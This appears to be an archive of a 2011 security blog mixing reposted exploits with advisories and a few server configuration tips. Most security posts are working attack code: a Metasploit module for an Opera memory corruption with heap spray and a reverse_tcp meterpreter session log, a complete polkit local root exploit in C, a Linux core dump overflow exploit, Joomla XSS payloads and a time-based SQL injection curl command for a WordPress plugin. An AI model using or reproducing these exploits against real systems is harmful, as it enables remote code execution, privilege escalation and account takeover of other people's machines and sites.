Oct 07

Opera 10/11 (bad nesting with frameset tag) Memory Corruption

By jason Application Security 1 Comment »

################################################################### Exploit for Opera 10/11 (bad nesting with frameset tag) Memory Corruption
#
# Vulnerability:
#
# Discovered: 2010-08-18
# Patched: 2011-05-18
# Tested on: v10.xx (v10.00, v10.01, v10.10, v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63)
#                           v11.xx < v11.11 (v11.00, v11.01 and v11.10)
# Patched on: v11.11
#
# Exploit:
#
# Coded: 2010-09-23
# Last revision: 2011-09-30
#
# RCE on: v10.00, v10.50, v10.51, v10.52, v10.54, v10.60, v10.62, v11.00, v11.01 and v11.10*
# DoS on: v10.01, v10.10, v10.53, v10.61 and v10.63
#
# Notes:
#
#   1) DEP bypass: possible but unreliable.
#   2) Let me know if you improve this one ;)
#   3) Most of times, it won’t work at first attempt and need crash-dialog interaction.
#
# Credits: Jose A. Vazquez of http://spa-s3c.blogspot.com
#
# Greets to: Ruben, Sinn3r, Metasploit Team, Corelan Team, etc
#
# Running against Opera v10.62…
#
#
#        =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
# + — –=[ 741 exploits - 378 auxiliary - 82 post
# + -- --=[ 228 payloads - 27 encoders - 8 nops
#        =[ svn r13801 updated 3 days ago (2011.09.27)
#
# msf > use windows/browser/opera_frameset_tag
# msf  exploit(opera_frameset_tag) > set payload windows/meterpreter/reverse_tcp
# payload => windows/meterpreter/reverse_tcp
# msf  exploit(opera_frameset_tag) > set LHOST 192.168.1.103
# LHOST => 192.168.1.103
# msf  exploit(opera_frameset_tag) > exploit
# [*] Exploit running as background job.
#
# [*] Started reverse handler on 192.168.1.103:4444
# msf  exploit(opera_frameset_tag) >
# [*] Using URL: http://0.0.0.0:8080/sUpFmezLW6jS
# [*]  Local IP: http://192.168.1.103:8080/sUpFmezLW6jS
# [*] Server started.
# [*] Sending Opera 10/11 (bad nesting with frameset tag) Memory Corruption to 192.168.1.104:1185 (target: Opera Browser (v10.6x – v11.xx) / Windows XP SP3 (DEP-default))
# [*] Sending stage 1 (Spraying the heap)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage (752128 bytes) to 192.168.1.104
# [*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.104:1190) at 2011-09-30 19:23:28 +0200
# Interrupt: use the ‘exit’ command to quit
# msf  exploit(opera_frameset_tag) > sessions
#
# Active sessions
# ===============
#
#   Id  Type                   Information                              Connection
#   –  —-                   ———–                              ———-
#   1   meterpreter x86/win32  0XDE1-A39ED4C12xde1 @ 0XDE1-A39ED4C12  192.168.1.103:4444 -> 192.168.1.104:1190
#
# msf  exploit(opera_frameset_tag) > sessions -i 1
# [*] Starting interaction with 1…
#
# meterpreter > getuid
# Server username: 0XDE1-A39ED4C12xde1
# meterpreter > execute -f  calc.exe
# Process 1336 created.
# meterpreter > exit
# [*] Shutting down Meterpreter…
# msf  exploit(opera_frameset_tag) >
#
######################################################
 
require ‘msf/core’
 
class Metasploit3 < Msf::Exploit::Remote
 
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
    
    def initialize(info = {})
    
        super(update_info(info,
            ‘Name’           => ‘Opera 10/11 (bad nesting with frameset tag) Memory Corruption’,
            ‘Description’    => %q{
            
                This module exploits a vulnerability in the nesting of frameset and iframe tags as implemented within
                Opera Browser. A memory corruption is triggered and some pointers got corrupted with invalid addresses.
                Successfully exploiting leads to remote code execution or denial of service condition under Windows XP
                SP3 (DEP = off).
                
                Note than most of cases, it won’t work at first attempt and need crash-dialog interaction.
                Read the last reference for further details.
                
            },
            ‘License’        => MSF_LICENSE,
            ‘Author’         =>
                [
                    'Jose A. Vazquez'
                ],
            ‘Version’        => ‘$Revision: 0011 $’,
            ‘References’     =>
                [
                    ['CVE', '2011-2628'],
                    ['OSVDB', '72406'],
                    ['BID', '47906'],
                    ['URL', 'http://www.beyondsecurity.com/ssd.html’],
                    ['URL', 'http://spa-s3c.blogspot.com/2011/09/spas3c-sv-004reliability-tests-ssd.html’]
                ],
            ‘DefaultOptions’ =>
                {
                    ‘EXITFUNC’          => ‘process’,
                    ‘HTTP::compression’ => ‘gzip’,
                    ‘HTTP::chunked’     => true
                },
            ‘Payload’        =>
                {
                    ‘Space’    => 1000,
                    ‘BadChars’ => "\x00",
                    ‘Compat’   =>
                        {
                            ‘ConnectionType’ => ‘-find’,
                        },
                    ‘StackAdjustment’ => -3500
                },
            ‘Platform’       => ‘win’,
            ‘Targets’        =>
                [
                    # Automatic
                    [ 'Automatic',
                        {}
                    ],
                    
                    # Opera > v10.54 ~ spray of 350 MB
                    [ 'Opera Browser (v10.6x - v11.xx) / Windows XP SP3 (DEP-default)',
                        {
                            'SizeofSpray' => 700,
                            'Ret' => 0x0c0c0c0c
                        }
                    ],
                    
                    # Opera <= v10.54 ~ spray of 250 MB
                    [ 'Opera Browser (v10.50 - v10.54) / Windows XP SP3 (DEP-default)',
                        {
                            'SizeofSpray' => 500,
                            'Ret' => 0x0c0c0c0c
                        }
                    ],
                    
                    # Opera < v10.50 doesn’t get crashed with previous method and it needs this one.
                    [ 'Opera Browser (v10.00 - v10.10) / Windows XP SP3 (DEP-default)',
                        {
                            'SizeofSpray' => 500,
                            'Ret' => 0x0c0c0c0c
                        }
                    ]
                ],
            ‘DisclosureDate’ => ’5 October 2011′,
            ‘DefaultTarget’  => 0))
            
    end
    
    #I don’t know if Msf::Exploit::Remote::BrowserAutopwn works, but I’m going to include my own auto-target selection
    
    def automatic_target(cli, request)
 
        thistarget = nil
    
        agent = request.headers['User-Agent']
 
        if agent =~ /Version\/10\.00/ or agent =~ /Version\/10\.01/ or agent =~ /Version\/10\.10/
            thistarget = targets[3]
        elsif agent =~ /Version\/10\.50/ or agent =~ /Version\/10\.51/ or agent =~ /Version\/10\.52/ or agent =~ /Version\/10\.53/ or agent =~ /Version\/10\.54/
            thistarget = targets[2]
        else
            thistarget = targets[1]
        end
        
        thistarget
        
    end
    
    def on_request_uri(cli, request)
    
        mytarget = target
        
        if target.name == ‘Automatic’
            mytarget = automatic_target(cli, request)
        end
    
        if(request.uri =~ /\.xhtml$/)
        
            #Send file for trigger the vulnerability for cases > v10.10    
                
            html = %Q|
                    <html xmlns="http://www.w3.org/1999/xhtml" xmlns:xht="http://www.w3.org/1999/xhtml">
                    <meta http-equiv="refresh" content="0;url=" />  
                        <xht:frameset>
                            <xht:iframe>
                                <xht:script>
                                rbc
                                </xht:script>
                                <style type="text/css">
                                    <!– /* padding CSS */
 
                                    approx:root{  
                                        font: 333em;
                                    }
                                    –>
                                </style>
                            </xht:iframe>
                        </xht:frameset>
                    </html>
                |
        
            #Send triggerer
        
            print_status("Sending stage 2 (Triggering the vulnerability)")
            
            var_contentype = ‘application/xhtml+xml’
            
        else
            
            #Send payload + hide iframe for trigger the vuln
        
            #Re-generate the payload
        
            return if ((p = regenerate_payload(cli)) == nil)
            
            #Encode the shellcode
            
            shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
            
            #Ret
            
            addr_word  = [mytarget.ret].pack(‘V’).unpack(‘H*’)[0][0,4]
            
            #Randomize the javascript variable names
            
            var_buffer      =   rand_text_alpha(rand(30)+2)
            var_shellcode   =   rand_text_alpha(rand(30)+2)
            var_unescape    =   rand_text_alpha(rand(30)+2)
            var_x           =   rand_text_alpha(rand(30)+2)
            var_i           =   rand_text_alpha(rand(30)+2)
 
            var_size        =   rand_text_alpha(rand(30)+2)
            var_nopsize     =   rand_text_alpha(rand(30)+2)
            var_limit       =   rand_text_alpha(rand(30)+2)
            
            var_function_trigger    =   rand_text_alpha(rand(30)+2)
            var_file_trigger    =   rand_text_alpha(rand(30)+2)
            
            var_timer_trigger = (rand(3) + 2) * 1000
            
            #Build the exploit
            
            var_url =  ((datastore['SSL']) ? "https://" : "http://")
            var_url << ((datastore['SRVHOST'] == ’0.0.0.0′) ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])
            var_url << ":" + datastore['SRVPORT']
            var_url << get_resource
            
            #Sending init HTML
            print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})")
            
            if mytarget.name =~ /v10.00/
            
            # Case v10.00 – v10.10
            
                html = %Q|
                    <html xmlns="http://www.w3.org/1999/xhtml" xmlns:xht="http://www.w3.org/1999/xhtml">
                        <xht:frameset>
                            <xht:iframe>
                                <xht:script>
                                    aaaaaa
                                </xht:script>
                            </xht:iframe>
                        </xht:frameset>
                        <script type="text/javascript">
                            <![CDATA[
                                var #{var_unescape}  = unescape;
                                var #{var_shellcode} = #{var_unescape}("#{shellcode}");
 
                                var #{var_size} = #{var_shellcode}.length * 2;
                                var #{var_nopsize} = 0x100000 - (#{var_size} + 0x14);
                                var #{var_buffer} = #{var_unescape}("%u#{addr_word}");
                                                        
                                while ( #{var_buffer}.length * 2 < #{var_nopsize} ) {
                                    #{var_buffer} += #{var_buffer};
                                }
 
                                var #{var_x} = new Array();
                                    
                                for ( var #{var_i} =0; #{var_i} < #{mytarget['SizeofSpray']}; #{var_i}++ ) {
                                    #{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode};
                                }
                                setInterval("location.reload()", 500);
                            ]]>
                        </script>
                    <html>
                    | 
        
                print_status("Sending simple stage (Sprayer and Triggerer)")
                var_contentype = ‘application/xhtml+xml’
            
            else
            
            # Case > v10.10
            
                html = %Q|
                        <html>
                            <head>
                                <script type="text/javascript">
                                    var #{var_unescape}  = unescape;
                                    var #{var_shellcode} = #{var_unescape}("#{shellcode}");
 
                                    var #{var_size} = #{var_shellcode}.length * 2;
                                    var #{var_nopsize} = 0×100000 – (#{var_size} + 0×14);
                                    var #{var_buffer} = #{var_unescape}("%u#{addr_word}");
                                                    
                                    while ( #{var_buffer}.length * 2 < #{var_nopsize} ) {
                                        #{var_buffer} += #{var_buffer};
                                    }
 
                                    var #{var_x} = new Array();
                                    
                                    for ( var #{var_i} =0; #{var_i} < #{mytarget['SizeofSpray']}; #{var_i}++ ) {
                                        #{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode};
                                    }
                                    
                                    function #{var_function_trigger}(){
                                        document.write("<iframe src=’#{var_url}/#{var_file_trigger}.xhtml’></iframe>");
                                    }
                                    
                                    setTimeout(‘#{var_function_trigger}()’,#{var_timer_trigger});
                                    
                                </script>
                            </head>
                        <html>
                    | 
                    
                print_status("Sending stage 1 (Spraying the heap)")
                var_contentype = ‘text/html’
                
            end
                
        end
    
        #Response
        send_response(cli, html, { ‘Content-Type’ => var_contentype, ‘Pragma’ => ‘no-cache’ })
        #Handle the payload       
        handler(cli)
        
    end
    
end

Tagged with:
Oct 06

linux local privilege escalation on polkit-1 <= 0.101

By jason Security Tools No Comments »

/* polkit-pwnage.c
*
*
* ==============================
* =      PolicyKit Pwnage      =
* =          by zx2c4          =
* =        Sept 2, 2011        =
* ==============================
*
*
* Howdy folks,
*
* This exploits CVE-2011-1485, a race condition in PolicyKit.
*
* davidz25 explains:
*
* –begin–
* Briefly, the problem is that the UID for the parent process of pkexec(1) is
* read from /proc by stat(2)’ing /proc/PID. The problem with this is that
* this returns the effective uid of the process which can easily be set to 0
* by invoking a setuid-root binary such as /usr/bin/chsh in the parent
* process of pkexec(1). Instead we are really interested in the real-user-id.
* While there’s a check in pkexec.c to avoid this problem (by comparing it to
* what we expect the uid to be – namely that of the pkexec.c process itself which
* is the uid of the parent process at pkexec-spawn-time), there is still a short
* window where an attacker can fool pkexec/polkitd into thinking that the parent
* process has uid 0 and is therefore authorized. It’s pretty hard to hit this
* window – I actually don’t know if it can be made to work in practice.
* –end–
*
* Well, here is, in fact, how it’s made to work in practice. There is as he said an
* attempted mitigation, and the way to trigger that mitigation path is something
* like this:
*
*     $ sudo -u `whoami` pkexec sh
*     User of caller (0) does not match our uid (1000)
*
* Not what we want. So the trick is to execl to a suid at just the precise moment
* /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed,
* and execl to the suid binary as our very next instruction.
*
* ** Usage **
* $ pkexec –version
* pkexec version 0.101
* $ gcc polkit-pwnage.c -o pwnit
* $ ./pwnit
* [+] Configuring inotify for proper pid.
* [+] Launching pkexec.
* sh-4.2# whoami
* root
* sh-4.2# id
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* sh-4.2#
*
* ** Targets **
* This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which
* as of writing uses 0.101, has backported 0.102′s bug fix. A way to check
* this is by looking at the mtime of /usr/bin/pkexec — April 22, 2011 or
* later and you’re out of luck. It’s likely other distributions do the same.
* Fortunately, this exploit is clean enough that you can try it out without
* too much collateral.
*
*
* greets to djrbliss and davidz25.
*
* – zx2c4
* 2-sept-2011
*
*/
 
 
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
 
int main(int argc, char **argv)
{
    printf("=============================\n");
    printf("=      PolicyKit Pwnage     =\n");
    printf("=          by zx2c4         =\n");
    printf("=        Sept 2, 2011       =\n");
    printf("=============================\n\n");
 
    if (fork()) {
        int fd;
        char pid_path[1024];
        sprintf(pid_path, "/proc/%i", getpid());
        printf("[+] Configuring inotify for proper pid.\n");
        close(0); close(1); close(2);
        fd = inotify_init();
        if (fd < 0)
            perror("[-] inotify_init");
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        read(fd, NULL, 0);
        execl("/usr/bin/chsh", "chsh", NULL);
    } else {
        sleep(1);
        printf("[+] Launching pkexec.\n");
        execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    }
    return 0;
}

Tagged with:
Oct 05

Config nginx for codeigniter

By jason Nginx Server No Comments »

Modify nginx config file

location ~ \.php($|/) {
root /var/www/html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
fastcgi_split_path_info ^(.+\.php)(.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
include fastcgi_params;
}

Modify codeigniter config

Before:
//$config['uri_protocol']       = "AUTO";
After:
$config['uri_protocol'] = "PATH_INFO";

Tagged with:
Oct 04

Cisco IOS Software IPv6 Denial of Service Vulnerability

By jason Security Bulletin No Comments »
Advisory ID: cisco-sa-20110928-ipv6
http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6.shtml

Revision 1.1

Last Updated 2011 September 30 2330 UTC (GMT)
For Public Release 2011 September 28 1600 UTC (GMT)

Contents

Summary
Affected Products
Details
Vulnerability Scoring Details
Impact
Software Versions and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

Summary

Cisco IOS Software contains a vulnerability in the IP version 6 (IPv6) protocol stack implementation that could allow an unauthenticated, remote attacker to cause a reload of an affected device that has IPv6 enabled. The vulnerability may be triggered when the device processes a malformed IPv6 packet.

Cisco has released free software updates that address this vulnerability. There are no workarounds to mitigate this vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6.shtml.

Note: The September 28, 2011, Cisco IOS Software Security Advisory bundled publication includes ten Cisco Security Advisories. Nine of the advisories address vulnerabilities in Cisco IOS Software, and one advisory addresses a vulnerability in Cisco Unified Communications Manager. Each advisory lists the Cisco IOS Software releases that correct the vulnerability or vulnerabilities detailed in the advisory as well as the Cisco IOS Software releases that correct all vulnerabilities in the September 2011 Bundled Publication.

Individual publication links are in "Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication" at the following link:

http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep11.html

Refrence:
 http://www.cisco.com/en/US/products/products_security_advisory09186a0080b95d59.shtml

Tagged with:
Oct 03

Joomla 1.7.0 is vulnerable to multiple Cross Site Scripting issues

By jason Application Security No Comments »

1. OVERVIEW

Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.

2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model鈥搗iew鈥揷ontroller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.

3. VULNERABILITY DESCRIPTION

Several parameters (searchword, extension, asset, author ) in Joomla!
Core components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim’s browser.

4. VERSION AFFECTED

1.7.0 <=

5. PROOF-OF-CONCEPT/EXPLOIT

component: com_search, parameter: searchword (Browser: IE, Konqueror)
==========================================================

[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search’;onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,
111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111
,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));
alert(String.fromCharCod(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};
//xsssssssssss&option=com_search
[/REQUEST]

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

User Login is required to execute the following XSSes.

Parameter: extension, Component: com_categories
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22

Parameter: asset , Component: com_media
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=

Parameter: author, Component: com_media
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=
&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.

7. SOLUTION

Upgrade to Joomla! 1.7.1-stable or higher.

8. VENDOR

Joomla! Developer Team
http://www.joomla.org

9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.

10. DISCLOSURE TIME-LINE

2011-07-29: notified vendor
2011-09-26: patched version, 1.7.1-stable, released
2011-09-29: vulnerability disclosed

11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_cross_site_scripting%28XSS%29
Vendor Advisory URLs:
http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerability
http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerability

Tagged with:
Oct 02

WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability

By jason Application Security No Comments »

# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)
 
—————
PoC (POST data)
—————
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl –data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 
—————
Vulnerable code
—————
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    …
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) – 1) * $limit;
 
    foreach($_POST["item"] as $key => $value){
        $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset ), $value );
        $result = mysql_query($sql);
    }
}

Tagged with:
Sep 19

Linux binfmt_elf core dump buffer overflow

By jason kernel-2.2.27 No Comments »

/*
* Linux binfmt_elf core dump buffer overflow
*
* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
// phase 1
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>

#include <sys/time.h>
#include <sys/resource.h>

#include <asm/page.h>

static char *env[10], *argv[4];
static char page[PAGE_SIZE];
static char buf[PAGE_SIZE];

void fatal(const char *msg)
{
if(!errno) {
fprintf(stderr, "\nFATAL: %s\n", msg);
}
else {
printf("\n");
perror(msg);
}
fflush(stdout); fflush(stderr);
_exit(129);
}

int main(int ac, char **av)
{
int esp, i, r;
struct rlimit rl;

__asm__("movl %%esp, %0" : : "m"(esp));
printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0],
av[ac-1]+strlen(av[ac-1]), esp);
rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
r = setrlimit(RLIMIT_CORE, &rl);
if(r) fatal("setrlimit");

memset(env, 0, sizeof(env) );
memset(argv, 0, sizeof(argv) );
memset(page, ‘A’, sizeof(page) );
page[PAGE_SIZE-1]=0;

// move up env & exec phase 2
if(!strcmp(av[0], "AAAA")) {
printf("\n[+] phase 2, <RET> to crash "); fflush(stdout);
argv[0] = "elfcd2";
argv[1] = page;

// term 0 counts!
memset(buf, 0, sizeof(buf) );
for(i=0; i<789 + 4; i++)
buf[i] = ‘C’;
argv[2] = buf;
execve(argv[0], argv, env);
_exit(127);
}

// move down env & reexec
for(i=0; i<9; i++)
env[i] = page;

argv[0] = "AAAA";
printf("\n[+] phase 1"); fflush(stdout);
execve(av[0], argv, env);

return 0;
}
__EOF__
cat <<__EOF__>elfcd2.c
// phase 2
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <syscall.h>

#include <sys/syscall.h>

#include <asm/page.h>

#define __NR_sys_read __NR_read
#define __NR_sys_kill __NR_kill
#define __NR_sys_getpid __NR_getpid

char stack[4096 * 6];
static int errno;

inline _syscall3(int, sys_read, int, a, void*, b, int, l);
inline _syscall2(int, sys_kill, int, c, int, a);
inline _syscall0(int, sys_getpid);

// yeah, lets do it
void killme()
{
char c=’a';
int pid;

pid = sys_getpid();
for(;;) {
sys_read(0, &c, 1);
sys_kill(pid, 11);
}
}

// safe stack stub
__asm__(
" nop \n"
"_start: movl \$0xbfff6ffc, %esp \n"
" jmp killme \n"
".global _start \n"
);
__EOF__
cat <<__EOF__>elfcd.ld
OUTPUT_FORMAT("elf32-i386", "elf32-i386",
"elf32-i386")
OUTPUT_ARCH(i386)
ENTRY(_start)
SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib);
SEARCH_DIR(/usr/i486-suse-linux/lib);

MEMORY
{
ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0×8000
rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0×10000
}

PHDRS
{
headers PT_PHDR PHDRS ;
text PT_LOAD FILEHDR PHDRS ;
fuckme PT_LOAD AT (0xbfff8000) FLAGS (0×00) ;
}

SECTIONS
{

.dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0×7000; } >rom :fuckme

. = 0xbfff0000 + SIZEOF_HEADERS;
.text : { *(.text) } >ram :text
.data : { *(.data) } >ram :text
.bss :
{
*(.dynbss)
*(.bss)
*(.bss.*)
*(.gnu.linkonce.b.*)
*(COMMON)
. = ALIGN(32 / 8);
} >ram :text

}

Tagged with:
Sep 15

Microsoft Excel Record Integer Signedness Vulnerability

By jason Security Bulletin No Comments »
I. BACKGROUND

Excel is the spreadsheet application included with Microsoft Corp.’s Office productivity software suite. More information is available at the following website:

http://office.microsoft.com/excel/

II. DESCRIPTION

Remote exploitation of an integer signedness vulnerability in Microsoft Corp.’s Excel could allow an attacker to execute arbitrary code with the privileges of the current user.

The vulnerability is an integer signedness issue that leads to an invalid array indexing vulnerability. It is triggered by a certain record with a negative ‘iax’ field.

It is possible to pass negative 16-bit values, which are later sign extended to 32 bits. The sign extended value is later used as an index into a heap-based array. Due to the incomplete validation of the ‘iax’ field, it is possible to index outside of the bounds of the array, which can lead to a controlled overwrite of arbitrary memory locations with user data. This can lead to the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user opening the file. To exploit this vulnerability, an attacker needs to convince a user to open a malicious file. Attackers typically accomplish this by e-mailing a targeted user the file or hosting the file on a Web page.

IV. DETECTION

Microsoft has reported the following products vulnerable: 

    * Microsoft Excel 2003 SP 3
    * Microsoft Excel 2007 SP 2
    * Microsoft Office 2007 SP 2
    * Microsoft Excel 2010 (32-bit editions)
    * Microsoft Excel 2010 SP 1 (32-bit editions)
    * Microsoft Office 2010 and Microsoft Office 2010 SP 1 (32-bit editions)
    * Microsoft Excel 2010 (64-bit editions)
    * Microsoft Excel 2010 SP 1 (64-bit editions)
    * Microsoft Office 2010 and Microsoft Office 2010 SP 1 (64-bit editions)
    * Microsoft Office 2004 for Mac
    * Microsoft Office 2008 for Mac
    * Microsoft Office for Mac 2011
    * Open XML File Format Converter for Mac
    * Microsoft Excel Viewer SP 2
    * Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP 2
    * Excel Services
    * Microsoft Excel Web App 2010 and Microsoft Excel Web App 2010 SP 1
V. WORKAROUND

Microsoft suggested workarounds can be found under the Workaround section within Microsoft Security Bulletin MS11-072.

http://technet.microsoft.com/en-us/security/bulletin/ms11-072

VI. VENDOR RESPONSE

Microsoft has released fixes which addresses this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown.

http://technet.microsoft.com/en-us/security/bulletin/ms11-072

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2011-1987 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

02/25/2011 Initial Vendor Notification

02/25/2011 Vendor Reply

09/13/2011 Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Sean Larsson, iDefense Labs.

Get paid for vulnerability research

http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events

http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2011 Verisign

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Tagged with:
Sep 15

iis7 and apache share port 80 in windows2008

By jason Apache Server No Comments »

1) Added or make sure your machine has two or more ip’s
2) Open a command prompt
3) Type netsh
4) Type http
5) Type sho iplisten. It should be blank
6) Type add iplisten ipaddress=192.168.0.90
You should get IP address successfully added
7) Type sho iplisten again
It should sho 192.168.0.90 in the list
8) Type exit to get out of netsh
9) Type type netstat -an. See if you notice 192.168.0.90:80 in the list. If you see 0.0.0.0:80, do an iisreset
10) Download and install Apache ( I did it with 2.2.4)
http://mirror.nyi.net/apache/httpd/binaries/win32/apache_2.2.4-win32-x86…
11) Do a default install,
12) Open httpd.conf and adjust the ip listen to 192.168.0.91:80

# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the
# directive.
#
# Change this to Listen on specific IP addresses as shown below to
# prevent Apache from glomming onto all bound IP addresses (0.0.0.0)
#
#Listen 12.34.56.78:80
#Was 80
#Change to

Listen 192.168.0.91:80

12) Restart the Apache service. (for some reason the start / stop thing didn’t work for me, I used net stop apache2 net start apache2.)
13) Type netstat -an
14) You should see 192.168.0.90:80 and 192.168.0.91:80. Open a browser and test both IP’s to see if IIS7 and Apache come up.
15) Test restarting Apache service to see if it works after that.
16) Turn off Apache, browse IIS, turn of IIS, browse Apache. Test it every which way to see if it works.

Tagged with:
Sep 14

cPanel < 11.30.2 Multiple CSRF Vulnerabilities

By jason Security Bulletin No Comments »

Test Code:

[+] Info=======================================================

[-] Exploit Title: cPanel < 11.30.2 Multiple CSRF Vulnerabilities
[-] Author: Net.Edit0r
[-] Home : Black-HG.Org ~ h4ckcity.org
[-] Version: 11.30.2
[-] Software Link: http://cpanel.net
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
[-] Date : 27/08/2011
[-] CVE : N/A
